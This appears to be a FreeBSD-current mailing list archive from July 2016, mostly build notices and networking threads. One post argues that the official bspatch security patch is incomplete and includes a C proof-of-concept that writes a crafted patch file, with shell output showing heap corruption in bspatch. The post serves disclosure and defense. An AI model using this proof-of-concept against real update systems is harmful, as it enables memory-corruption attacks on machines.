List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 01:06:49 -0000 +imre, Hi! Larry is having issues with r303418. Would you be able to help him out? (If it's not too bad, can we back this out until you figure out what's going on?) Thanks! -a On 28 July 2016 at 18:05, Larry Rosenman wrote: > On 2016-07-28 20:02, Adrian Chadd wrote: >> >> Hi, >> >> Which commit(s) did you revert? >> >> >> >> -a > > > revert r303418 > > and now it connects again. > > > -- > Larry Rosenman http://www.lerctr.org/~ler > Phone: +1 214-642-9640 E-Mail: ler@lerctr.org > US Mail: 17716 Limpia Crk, Round Rock, TX 78664-7281 From owner-freebsd-current@freebsd.org Fri Jul 29 03:18:41 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 95DE8BA7BFE for ; Fri, 29 Jul 2016 03:18:41 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 881EA16C5; Fri, 29 Jul 2016 03:18:41 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 4D0E8169; Fri, 29 Jul 2016 03:18:41 +0000 (UTC) Date: Fri, 29 Jul 2016 03:18:38 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1001180865.47.1469762318966.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1946667759.46.1469752125626.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1946667759.46.1469752125626.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #494 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 03:18:41 -0000 See From owner-freebsd-current@freebsd.org Fri Jul 29 03:51:29 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 50D3BBA6301 for ; Fri, 29 Jul 2016 03:51:29 +0000 (UTC) (envelope-from mschroeder@vfemail.net) Received: from vfemail.net (onethreetwo.vfemail.net [199.16.11.132]) (using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id EF854164B for ; Fri, 29 Jul 2016 03:51:28 +0000 (UTC) (envelope-from mschroeder@vfemail.net) Received: (qmail 67438 invoked by uid 89); 29 Jul 2016 03:51:27 -0000 Received: from localhost (HELO freequeue.vfemail.net) (127.0.0.1) by localhost with (DHE-RSA-AES256-SHA encrypted) SMTP; 29 Jul 2016 03:51:27 -0000 Received: (qmail 67174 invoked by uid 89); 29 Jul 2016 03:51:10 -0000 Received: by simscan 1.3.1 ppid: 67172, pid: 67173, t: 0.0026s scanners:none Received: from unknown (HELO smtp101-2.vfemail.net) (172.16.100.61) by FreeQueue with SMTP; 29 Jul 2016 03:51:10 -0000 Received: (qmail 28299 invoked by uid 89); 29 Jul 2016 03:51:09 -0000 Received: by simscan 1.4.0 ppid: 28292, pid: 28295, t: 0.0628s scanners:none Received: from unknown (HELO www.vfemail.net) (bXNjaHJvZWRlckB2ZmVtYWlsLm5ldA==@172.16.100.92) by 172.16.100.61 with ESMTPA; 29 Jul 2016 03:51:09 -0000 Received: from 4MkatQJk6CyHiXpClmFzPiVG0bmsk2kSbQL8mOdwihmr487p6CaeM8fu8iOcEqKg+Pu6ZrbSt6M= (4o2F7DYpU9wQ9OAbGTX1448WzFno7ARU) by www.vfemail.net with HTTP (HTTP/1.1 POST); Thu, 28 Jul 2016 22:51:09 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII; format=flowed Content-Transfer-Encoding: 7bit Date: Fri, 29 Jul 2016 03:51:09 +0000 From: Martin Schroeder To: freebsd-current@freebsd.org Subject: freebsd-update and portsnap users still at risk of compromise Message-ID: <8c4a3afc1954d7b0af91d6003335c071@vfemail.net> X-Sender: mschroeder@vfemail.net User-Agent: Roundcube Webmail/1.0.1 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 03:51:29 -0000 On July 18, John Leyden, security editor at The Register, tweeted a link to a libarchive ticket that had been sitting without a response for almost a week. tweet: https://twitter.com/jleyden/status/755016810865582081 libarchive ticket: https://github.com/libarchive/libarchive/issues/743 The ticket creator quoted an AV researcher who was likely posting to one of the many early-alert vendor lists in the age of infosec balkanization (IOW, a "courtesy heads-up" to FreeBSD users forking them money): [QUOTE] Our AV researchers have analyzed the following link that was cloud- submitted as suspect: https://gist.github.com/anonymous/e48209b03f1dd9625a992717e7b89c4f The document is from an unknown author and describes "non-cryptanalytic attacks against FreeBSD update components." The affected components are the portsnap and freebsd-update tools, both directly and indirectly. From what we can tell, the text file is part of a larger stash of documents, all with the same attack-defense style. We have other documents, dated 2014 and 2015, detailing attacks against the update systems of multiple Linux distributions and the corresponding defenses against "the adversary." We believe this to be the work of an MITM-capable advanced threat actor. Full details of our findings will be released in the coming weeks. This is a courtesy heads-up to FreeBSD users. [/QUOTE] Another poster confirmed some of the attacks: [QUOTE] Here via John Leyden's tweet. I don't have the time to test the portsnap attacks, but I can confirm that the libarchive/tar and bspatch attacks work on our 10.x machines, and I'm happy to test any libarchive/tar fixes. Judging by the painstaking amount of work put into the bspatch exploit especially, I think it's highly unlikely that the creator lacks the means to deploy it via mitm. Otherwise, I've never seen anything like this in terms of apparent work/reward. It would be comical if it weren't so horrifying. Think of all those locked-down fbsd machines that have no external-facing daemons/services and that perform only updates. Our telecommunications floor alone has several dozen. Someone needs to alert the fbsd mailing lists (-current, -security?) pronto. I'd rather not mail them myself from work. And we should also get more details on the linux distributions. [/QUOTE] I've been analyzing the document extensively since then. The targets are as follows: [1] portsnap via portsnap vulnerabilities [2] portsnap via libarchive & tar anti-sandboxing vulnerabilities [3] portsnap via bspatch vulnerabilities [4] freebsd-update via bspatch vulnerabilities Nothing has appeared in any official FreeBSD source about [1]. The libarchive developers have finally confirmed [2] and are presumably working on fixes. A FreeBSD advisory just appeared for [3] & [4] (bspatch), but users should be aware that running freebsd-update exposes their machines to the very vulnerability it's correcting (a not insignificant fact that was omitted from the advisory). Here's why: [QUOTE] * The bspatch(1) utility is executed before SHA256 verification in both * freebsd-update(8) and portsnap(8). [/QUOTE] Even worse, the patch in the FreeBSD advisory is insufficient to prevent heap corruption. I compared the patch in the FreeBSD advisory with the "defense" patch in the document, and the former contains only a subset of the checks in the latter. The document patch is in some ways cautious to an insanely paranoid degree, mistrusting the error-checking stability of system libraries and defending against compiler quirks that probably won't exist in compiler optimization intelligence for many years, if ever, though as a developer of clang-based static analyzers, I did take an interest in one of the more usual integer-overflow culprits: [ADVISORY PATCH - CONTAINS ONLY A SUBSET OF DOCUMENT PATCH] /* Sanity-check */ + if ((ctrl[0] < 0) || (ctrl[1] < 0)) + errx(1,"Corrupt patch\n"); + + /* Sanity-check */ if(newpos+ctrl[0]>newsize) errx(1,"Corrupt patch\n"); [/ADVISORY PATCH] [DOCUMENT PATCH - THE CORRESPONDING PORTION] /* Sanity-check */ - if(newpos+ctrl[0]>newsize) - errx(1,"Corrupt patch\n"); + if((ctrl[0]<0) || (ctrl[0]>INT_MAX) || + (newpos>OFF_MAX-ctrl[0]) || (newpos+ctrl[0]>newsize)) + errx(1,"Corrupt patch\n"); - /* Read diff string */ + /* Read diff string - 4th arg converted to int */ lenread = BZ2_bzRead(&dbz2err, dpfbz2, new + newpos, ctrl[0]); if ((lenread < ctrl[0]) || ((dbz2err != BZ_OK) && (dbz2err != BZ_STREAM_END))) errx(1, "Corrupt patch\n"); [/DOCUMENT PATCH] The ctrl[1] checks in the document patch are similar. The basic idea is that for if(newpos+ctrl[0]>newsize) and if(newpos+ctrl[1]>newsize) it's not enough to block a negative ctrl[]. That will stop the exploit given, but it won't stop additional exploits. The document patch defends against additional exploits, namely those based on newpos+ctrl[] overflowing via a large ctrl[] to bypass the check. The canonical large value I use below is 0x7fffffff7fffffff, which is both off_t nonnegative and int nonnegative (when truncated in BZ2_bzRead). The document patch defends against this truncation trickery as well. To demonstrate the problem, I wrote the code below. Examine it on a FreeBSD x64 machine under gdb, valgrind, or whatever, even with the advisory patch applied. [CODE] #include #include #include #include #include int main(int argc, char **argv) { unsigned char oct; char buff[100000]; char c[72]= "\x00\x00\x00\x00\x00\x00\x00\x00" "\xff\xff\xff\x7f\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x02\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\xff\xff\xff\x7f\xff\xff\xff\x7f" "\x00\x00\x00\x00\x00\x00\x00\x00"; char *e=calloc(1,0x8fffffff); if(!e) return 1; unsigned l,tmp; int comp=atoi(argv[1]); int fd=open(argv[2],O_WRONLY|O_CREAT|O_TRUNC,0666); write(fd,"BSDIFF40",8); l=sizeof(buff); BZ2_bzBuffToBuffCompress(buff,&l,c,sizeof(c),comp,0,0); tmp=l; for(int i=0;i<8;i++){oct=tmp&0xff;write(fd,&oct,1);tmp>>=8;} write(fd,"\x00\x00\x00\x00\x00\x00\x00\x00",8); write(fd,"\x02\x00\x00\x80\x00\x00\x00\x00",8); write(fd,buff,l); l=sizeof(buff); BZ2_bzBuffToBuffCompress(buff,&l,e,0x8fffffff,comp,0,0); write(fd,buff,l); close(fd); free(e); return 0; } [/CODE] [ms@dev4 ~/patch]$ cc -o bp bp.c -lbz2 [ms@dev4 ~/patch]$ echo 123 > old [ms@dev4 ~/patch]$ ./bp 1 patch [ms@dev4 ~/patch]$ bspatch old new patch Segmentation fault (core dumped) [ms@dev4 ~/patch]$ ./bp 9 patch [ms@dev4 ~/patch]$ bspatch old new patch bspatch: Corrupt patch Counterintuitively, the segfault case is (currently) less dangerous than the error case. This is because the segfault arises from harmlessly trashing the heap until an unmapped page is hit (though you never know what the future - or creativity - brings). But taking a cue from a comment in the exploit, I bumped up the compression to level 9, which positioned a lot of libbz2 internal data after the buffer. This data gets overwritten and could very likely be finessed to dangerous effect. The error message is simply because after pulling out my hair to figure out bspatch, I had no desire to follow the author down the rabbit hole of bzip2/jemalloc/libc internals, which shall remain for me black magic. Martin Schroeder ------------------------------------------------- ONLY AT VFEmail! - Use our Metadata Mitigator to keep your email out of the NSA's hands! $24.95 ONETIME Lifetime accounts with Privacy Features! 15GB disk! No bandwidth quotas! Commercial and Bulk Mail Options! From owner-freebsd-current@freebsd.org Fri Jul 29 04:41:47 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id A7DA0BA6C49 for ; Fri, 29 Jul 2016 04:41:47 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: from mail-qt0-x233.google.com (mail-qt0-x233.google.com [IPv6:2607:f8b0:400d:c0d::233]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 5F24319B7 for ; Fri, 29 Jul 2016 04:41:47 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: by mail-qt0-x233.google.com with SMTP id w38so60684517qtb.0 for ; Thu, 28 Jul 2016 21:41:47 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:cc:subject:message-id:references:mime-version :content-disposition:in-reply-to:user-agent; bh=8CkCyyYRMLhlp4sPnVS1UpkBJP6Fy+Js8VunDzuiZLw=; b=jhvnDseOn4dgjznJCSxnIAkQFuBCq3UJneownRjOIJkCFoXM4j7EJqBDiU/ZlEqX3X 7thsDaGil837KQ04TaJ7N1Ff1YFOS9fB3Wzud3aEz15znCe4Wxo0BuMOOnYYD3mZZD1P IISp6+7n7O3TZ1AR3+7yj8Z7cVWrl5zf08CaKy1tQpEcE4U1ao7ieH6oOA2yOyh3FGzE mY3Ubx/D5gwpxwbo5k+d/RC8fNkIY06DYYgtGhmLPdOmtGUj0/KitN4fqf9l2VmbReWR Tyu6NKKkmK+Aa88d/VsNXieYyxCkZj2/5H/N8azMY0dB5tboN8YbDPIPKIoVqp2tfr7z 3Kog== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:references :mime-version:content-disposition:in-reply-to:user-agent; bh=8CkCyyYRMLhlp4sPnVS1UpkBJP6Fy+Js8VunDzuiZLw=; b=WSiIVTHq3CJnlWiii9Ib6N3rsvytwslbr/hYHIAuzHX453dn1QLst+uWkNK7mxkPkf /IHHZLGMkKrTta9GacQ8HoCC+sqbyC09xpT8L11poe64RACCvdZnxGfzmQMLWVWQLOtT wwG3sCrunV/hWYDc0ziUSzptp9bYLUPQTUKCVs9g7WZPiidxjVrJiiVSBTAdGiBjIXgQ khi0pNjcW/1wU4pIipUEd0Xwwbmf39MtNehQ1Xo4BCkhip0m4rKN0vMCsl9qZDhKnw+q qlSzR3qh3ua5uwl3225pFWxCl8Zps17UjSjoBjoT7hoIxzXHDWvCrJVz6hAlRnuQ08c9 D08w== X-Gm-Message-State: AEkoouuBB34HqZMc35jVBDcLuiNKZgabfUr1TDpj3k6NMPDgwVEDck3h4HOOx0/dpLWgZg== X-Received: by 10.200.53.24 with SMTP id y24mr62020356qtb.16.1469767306505; Thu, 28 Jul 2016 21:41:46 -0700 (PDT) Received: from gmail.com (c-98-216-247-110.hsd1.ma.comcast.net. [98.216.247.110]) by smtp.gmail.com with ESMTPSA id i65sm9131921qtb.18.2016.07.28.21.41.45 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Thu, 28 Jul 2016 21:41:45 -0700 (PDT) Date: Fri, 29 Jul 2016 00:41:43 -0400 From: Randy Westlund To: Ronald Klop Cc: freebsd-current@freebsd.org Subject: Re: wpa_supplicant doesn't work with lagg Message-ID: <20160729044143.GI26793@gmail.com> References: <20160728194146.GE26793@gmail.com> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="GvznHscUikHnwW2p" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 04:41:47 -0000 --GvznHscUikHnwW2p Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jul 29, 2016 at 12:02:56AM +0200, Ronald Klop wrote: > I had the same problem a while ago. > For some reason you need to use this construction to set the MAC now. >=20 > create_args_wlan0=3D"wlanaddr 00:26:b9:12:34:56 country NL" >=20 > I don't know why this changed. Thanks, that works. I've filed a PR to update the handbook: https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D211436 --GvznHscUikHnwW2p Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXmt6HAAoJEGaweXjzNsmpafIIALdyG+XQBNsQWTs29+yaa57w fXhHN6pCrrIiranH3NpsINHzj2a6rrQTDRSE5HWPG5xmdw/2yrBxMA4VNDJVGCSS vrT0zoxZxvXPO/D2CHW7mFQgF5oiFkHraByi0lON0LiK9RdPJJOUl1hfsYtveETo +HhDXmbpVezH7CiiYJKOS4vHWhAdJBXoHQfABoQkQaADzPaFFzq5Dim7AICEct3E XNEH2qqIrdrOBqpevO8EuI+++3Wg4q3gAFWTudBCqs5SiT9zu4IQQaGMI6m9XrC6 nicQaqcZ/EY222yQc04NnCu/wdKCfWuSA66KLCZNRH1erhKrTQ6fUyaT/XHzU34= =1F2+ -----END PGP SIGNATURE----- --GvznHscUikHnwW2p-- From owner-freebsd-current@freebsd.org Fri Jul 29 04:56:56 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 8BADDBA6F18 for ; Fri, 29 Jul 2016 04:56:56 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: from mail-qt0-x244.google.com (mail-qt0-x244.google.com [IPv6:2607:f8b0:400d:c0d::244]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 3AF281F93 for ; Fri, 29 Jul 2016 04:56:56 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: by mail-qt0-x244.google.com with SMTP id q11so4180351qtb.2 for ; Thu, 28 Jul 2016 21:56:56 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:subject:message-id:mime-version:content-disposition :user-agent; bh=oiIymcyLaZxyN0tlPSaHUjU+equqNgVbxh5SlfR6nFc=; b=gGh/QiI0akfxL1y3RITU1+ISZINSp53k0g3HW4Z5pYhxR3qLPuncoWK6/LxBFe452J QdFRNKMzh+2wndhG0fE7GXjOAY/qjkjd5hWApc61rxv8one2nz8ChCyYdx8INpnNwDQ2 VEoFFyGtdbewWQDZSpQfhMtndQZUSwzAxWujUgRQGBinbKhgeu0tvaXFljVfkJceJrfJ 6SSxnoQg3zuGIeRZiojkdAW1VmBCcmmH8PAj+DR5lXrhq6DLz1A5taELib348peEcSwU SOj3hXbfaJyb51fKTl5W4b3md2idVhCVLURJOFYNhT6QSY9QkTWMHIR3/XUUg8n9/bQa 7xPQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:subject:message-id:mime-version :content-disposition:user-agent; bh=oiIymcyLaZxyN0tlPSaHUjU+equqNgVbxh5SlfR6nFc=; b=ZGtoDkB8v+g+aYcXCEWMCCz7pE8bVAI+YU99Qb5ZV3Q8FQ5Yk35JyO9QBvfwURiZ6s 98v45Ir0XNR70cI6RyZaBfOirwHPCRpHqlRqSiuVa8IGzR03G3wj1yPyoAccQzx/04bl 93oTEOFL4B2ToQwHA9TrI+VEl8LY6n2OnPmv3hqvIXWEOnHDSHhOrp8xHRn7qb1cehQm RQ7BV+vi2JV44kG7ZuWl5Jw8F1Gz2YqzEzjSWwWFnPNjC6sHAzEsxmFoPrSeVdICACNy AJoUW1+/WvN7sbA69JiQWlmpSYab1wMvAkzKMCpqo76XSA+QxdRWMb6TZ2i9kTHG5O8W jeiQ== X-Gm-Message-State: AEkoousQmD70Jp2k8HubSMtjv06TY8xY1BfcK2tAh8VG8FZZRAotAHzKc75Ar/r8UM37dA== X-Received: by 10.200.48.193 with SMTP id w1mr64520326qta.8.1469768215088; Thu, 28 Jul 2016 21:56:55 -0700 (PDT) Received: from gmail.com (c-98-216-247-110.hsd1.ma.comcast.net. [98.216.247.110]) by smtp.gmail.com with ESMTPSA id k1sm9180296qta.8.2016.07.28.21.56.54 for (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Thu, 28 Jul 2016 21:56:54 -0700 (PDT) Date: Fri, 29 Jul 2016 00:56:52 -0400 From: Randy Westlund To: freebsd-current@freebsd.org Subject: bhyve with lagg failover doesn't work on wifi Message-ID: <20160729045652.GJ26793@gmail.com> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="VJJoKLVEFXdmHQwR" Content-Disposition: inline User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 04:56:56 -0000 --VJJoKLVEFXdmHQwR Content-Type: text/plain; charset=us-ascii Content-Disposition: inline I'm using bhyve on 11.0-BETA2, bridging tap0 to lagg0, a failover between wifi and ethernet. The bhyve VM's networking only works I'm using ethernet. > # Lagg config. > ifconfig_em0="up" > create_args_wlan0="wlanaddr 3c:97:0e:46:70:ca" > wlans_iwn0="wlan0" > ifconfig_wlan0="WPA" > cloned_interfaces="lagg0 bridge0 tap0" > ifconfig_lagg0="laggproto failover laggport em0 laggport wlan0 DHCP" > # tap0 and bridge0 are for bhyve. > ifconfig_bridge0="addm lagg0 addm tap0" With the ethernet cable connected, the VM's networking works. But when I remove the ethernet cable and lagg0 fails over to wifi, the VM can no longer use the network. I can use tcpdump to see the DHCP packets going along this path: vtnet0 -> tap0 -> bridge0 -> lagg0 -> wlan0 The DHCP requests appear on wlan0. But the router never sees them. Here's the ifconfig output when wlan0 is active: > em0: flags=8943 metric 0 mtu 1500 > options=4219b > ether 3c:97:0e:46:70:ca > nd6 options=29 > media: Ethernet autoselect > status: no carrier > lo0: flags=8049 metric 0 mtu 16384 > options=600003 > inet6 ::1 prefixlen 128 > inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 > inet 127.0.0.1 netmask 0xff000000 > nd6 options=21 > groups: lo > wlan0: flags=8943 metric 0 mtu 1500 > ether 3c:97:0e:46:70:ca > nd6 options=29 > media: IEEE 802.11 Wireless Ethernet MCS mode 11ng > status: associated > ssid neural_network channel 1 (2412 MHz 11g ht/40+) bssid c4:04:15:90:f5:fd > regdomain FCC country US authmode WPA2/802.11i privacy ON > deftxkey UNDEF AES-CCM 2:128-bit AES-CCM 3:128-bit txpower 30 bmiss 10 > scanvalid 60 protmode CTS ampdulimit 64k ampdudensity 8 > -amsdutx amsdurx shortgi -stbc wme roaming MANUAL > groups: wlan > lagg0: flags=8943 metric 0 mtu 1500 > ether 3c:97:0e:46:70:ca > inet 192.168.1.17 netmask 0xffffff00 broadcast 192.168.1.255 > nd6 options=29 > media: Ethernet autoselect > status: active > groups: lagg > laggproto failover lagghash l2,l3,l4 > laggport: em0 flags=1 > laggport: wlan0 flags=4 > bridge0: flags=8843 metric 0 mtu 1500 > ether 02:4a:6b:6e:fc:00 > nd6 options=9 > groups: bridge > id 00:00:00:00:00:00 priority 32768 hellotime 2 fwddelay 15 > maxage 20 holdcnt 6 proto rstp maxaddr 2000 timeout 1200 > root id 00:00:00:00:00:00 priority 32768 ifcost 0 port 0 > member: tap0 flags=143 > ifmaxaddr 0 port 6 priority 128 path cost 2000000 > member: lagg0 flags=143 > ifmaxaddr 0 port 4 priority 128 path cost 55 > tap0: flags=8943 metric 0 mtu 1500 > options=80000 > ether 00:bd:ea:f0:f6:00 > nd6 options=29 > media: Ethernet autoselect > status: active > groups: tap > Opened by PID 1322 --VJJoKLVEFXdmHQwR Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXmuIUAAoJEGaweXjzNsmpu50H/ikXVjaFh5hkqQlW3ZK8aU8t qSPw5xlvwGca/rLlLMaFDDqq6Uv2vEM+v698asKjr3Ydr4KW+GYS8HPPvz8PAHei tZFgGBVpXTMlzgU3UU6EsRPblsCsPuicxGSHf9rwandcBI7DSmfrQUJnLUA1x409 wx/HboQc9hSh4J+K9jUj3AwmfJ2eXvotZs3DvomiliyPbzabDK4WXeXcZCkH0+x6 g78wjVttjSP5v1aqr7A9Bg9SGs4/YOcxvXSTCTcftt1gszXREFBnFLiYz/Q+WxFr 7l8C4/t4Chs+M8UVX7Vd3uhl9G8lrfasiGlBoO3BGMSCayj/ilOpMU/MKXR8zhI= =A6Tj -----END PGP SIGNATURE----- --VJJoKLVEFXdmHQwR-- From owner-freebsd-current@freebsd.org Fri Jul 29 06:05:45 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id CCE9ABA6026 for ; Fri, 29 Jul 2016 06:05:45 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id B2223144C; Fri, 29 Jul 2016 06:05:45 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 98CD2174; Fri, 29 Jul 2016 06:05:45 +0000 (UTC) Date: Fri, 29 Jul 2016 06:05:43 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1710549158.48.1469772343990.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1001180865.47.1469762318966.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1001180865.47.1469762318966.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #495 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 06:05:45 -0000 See From owner-freebsd-current@freebsd.org Fri Jul 29 09:04:57 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id EAE31BA7986 for ; Fri, 29 Jul 2016 09:04:57 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id DD34C1FE3; Fri, 29 Jul 2016 09:04:57 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id CBAE0178; Fri, 29 Jul 2016 09:04:57 +0000 (UTC) Date: Fri, 29 Jul 2016 09:04:57 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <244868077.49.1469783097375.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1710549158.48.1469772343990.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1710549158.48.1469772343990.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #496 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: 